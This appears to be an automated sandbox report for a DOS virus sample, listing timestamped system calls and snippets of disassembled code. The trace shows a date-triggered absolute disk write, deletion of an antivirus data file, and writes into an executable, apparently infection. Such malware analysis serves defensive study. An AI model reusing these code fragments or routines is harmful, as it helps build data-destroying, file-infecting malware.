Sample viewer

vx.netlux.org/Virus.DOS.Birgit.999.f

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:54:05.534261032Z 42 PC: 12a62 | Get date 0x12a62: cmp dl, 0x12
0x12a65: jne 0x12a6e
0x12a67: mov cx, 0xae
0x12a6a: mov al, 2
0x12a6c: int 0x26
0x12a6e: popaw
0x12a6f: mov ah, 0x47
0x12a71: mov dl, 0
0x12a73: lea si, word ptr [bp + 0x361]
0x12a77: int 0x21
0x12a79: call 0x12a80
0x12a7c: jmp 0x12aab
0x12a7e: add byte ptr [bx + si], al
0x12a80: pushaw
0x12a81: mov dx, word ptr ds:[bp + 0x13e]
0x12a86: jmp 0x12a8c
0x12a88: mov ah, 0x4c
0x12a8a: int 0x21
0x12a8c: mov cx, 0xae
0x12a8f: lea si, word ptr [bp + 0x16b]
2018-12-17T21:54:05.537046667Z 71 PC: 12a79 | Get current directory
2018-12-17T21:54:05.539826502Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.541454925Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.543426672Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.544788951Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.546241177Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.548169297Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.549918016Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.55198926Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.553670543Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.555879365Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.557325005Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.558700991Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.560717601Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.562188686Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.563716356Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.56601408Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.567449248Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.568825374Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.571254385Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.572522379Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.57403296Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.576611854Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.578163684Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.579510088Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.581448845Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.583050414Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.584701934Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.587196523Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.588729451Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.590764522Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.592537858Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.596459921Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.600160214Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.608053276Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.610672658Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.612317257Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.617828874Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.62035982Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.621874071Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.623675848Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.626977152Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.628361126Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.629666057Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.631381297Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.633210074Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.634669172Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.636688174Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.63806138Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.639746369Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.642029024Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.643935244Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.645735771Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.648492135Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.650307466Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.652061696Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.654631523Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.656285675Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.658033045Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.660431677Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.662241171Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.663972606Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.666437851Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.668531367Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.670287651Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.673031013Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.674780129Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.676484751Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.678405314Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.680874643Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.682591471Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.684291143Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.686629049Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.688200174Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.689819609Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.691969247Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.693565934Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.695301959Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.698022961Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.699750723Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.701215262Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.703559301Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.70498236Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.706378369Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.708839746Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.710334196Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.711802488Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.71535344Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.717067682Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.71869195Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.720994823Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.722687851Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.72430359Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.726705686Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.72943151Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.731147902Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.732869197Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.7344809Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.735818149Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.737636964Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.739027492Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.740463893Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.742309712Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.743607503Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.744822333Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.746753221Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.748043535Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.749380757Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.751311004Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.752779332Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.754319987Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.756280095Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.757684039Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.759036245Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.761019461Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.762560329Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.763900673Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.76571602Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.76705008Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.768510991Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.770355037Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.771705982Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.773258585Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.775066983Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.776577062Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.778071216Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.780033871Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.781494994Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.783181651Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.785559453Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.786977989Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.788341476Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.790345742Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.791615515Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.793000349Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.794956091Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.796340262Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.79845744Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.806361412Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.808382456Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.810445995Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.812398383Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.814083895Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.815947318Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.817667186Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.819379534Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.820833633Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.82186138Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.823025306Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.824302188Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.825347746Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.826254038Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.828501976Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.829553817Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.830436878Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.832198921Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.833339108Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.834439438Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.835621252Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.837011611Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.838112502Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.839425186Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.840564672Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.841553858Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.843053567Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.843969016Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.845039249Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.846370982Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.848436951Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.849741459Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.851033085Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.851999987Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.853538365Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.854610651Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.855633988Z 68 PC: 12aa6 | I/O control for devices (Set for = '� ��')
2018-12-17T21:54:05.856914524Z 250 PC: 12ab5 | UNKNOWN!
2018-12-17T21:54:05.857952003Z 67 PC: 12aee | Get or set file attributes
2018-12-17T21:54:05.862312005Z 65 PC: 12af2 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-17T21:54:05.866284648Z 44 PC: 12b0e | Get time 0x12b0e: mov word ptr ds:[bp + 0x13e], dx
0x12b13: jmp 0x12b31
0x12b15: mov ah, 0x3b
0x12b17: lea dx, word ptr [bp + 0x3b3]
0x12b1b: int 0x21
0x12b1d: mov al, byte ptr ds:[bp + 0x3b6]
0x12b22: cmp byte ptr ds:[bp + 0x3b6], 3
0x12b28: je 0x12b88
0x12b2a: inc al
0x12b2c: mov byte ptr ds:[bp + 0x3b6], al
0x12b31: mov ax, 0x4e00
0x12b34: mov cx, 0
0x12b37: lea dx, word ptr [bp + 0x252]
0x12b3b: int 0x21
0x12b3d: jae 0x12b42
0x12b3f: jmp 0x12c46
0x12b42: push 0x4300
0x12b45: pop ax
0x12b46: mov dx, 0x9e
0x12b49: int 0x21
2018-12-17T21:54:05.867761211Z 78 PC: 12b3d | Find first file
2018-12-17T21:54:05.871295091Z 67 PC: 12b4b | Get or set file attributes
2018-12-17T21:54:05.875344806Z 67 PC: 12b58 | Get or set file attributes
2018-12-17T21:54:06.132363073Z 61 PC: 12b60 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:54:06.139083385Z 63 PC: 12b6f | Read file or device (Read 4 bytes on handle 5)
2018-12-17T21:54:06.145990931Z 87 PC: 12bbb | Get or set file date and time
2018-12-17T21:54:06.147534902Z 66 PC: 12bce | Move file pointer
2018-12-17T21:54:06.14882323Z 64 PC: 12bdb | Write file or device (Write 1 bytes on handle 5)
2018-12-17T21:54:06.153090932Z 64 PC: 12bfa | Write file or device (Write 2 bytes on handle 5)
2018-12-17T21:54:06.155758461Z 64 PC: 12c07 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T21:54:06.158645008Z 66 PC: 12c12 | Move file pointer
2018-12-17T21:54:06.161474296Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.163195433Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.16466749Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.167458341Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.168932909Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.170330652Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.172368222Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.173880616Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.175636633Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.177330473Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.178911843Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.180806585Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.182287913Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.18370218Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.185914848Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.187519327Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.189148802Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.191261438Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.19263194Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.193958376Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.196278539Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.197854668Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.199381641Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.20162095Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.20290945Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.20423334Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.206477916Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.207688287Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.208893835Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.21145659Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.212788782Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.214143145Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.216029856Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.217336566Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.218556013Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.220277022Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.222030862Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.223685688Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.226478624Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.227980618Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.229422111Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.231398889Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.232703498Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.234664598Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.236247127Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.238021159Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.240131819Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.241638409Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.24377779Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.245673687Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.24696924Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.249209665Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.251155451Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.252441333Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.253660389Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.255584066Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.256961715Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.25840543Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.261006778Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.262569955Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.264103094Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.266876893Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.268295151Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.269900462Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.272485062Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.274196525Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.275827897Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.27844455Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.279942155Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.281463451Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.282815848Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.284095503Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.285477048Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.287409992Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.288768687Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.2905109Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.291848508Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.293068776Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.294805115Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.296268284Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.297666623Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.299770731Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.301772076Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.306170671Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.307977147Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.309268499Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.310682271Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.312430451Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.313697671Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.314942427Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.317424469Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.318852752Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.319925635Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.321574748Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.322720116Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.324320438Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
2018-12-17T21:54:06.325863006Z 68 PC: 12aa6 | I/O control for devices (Set for = 'P�A���')
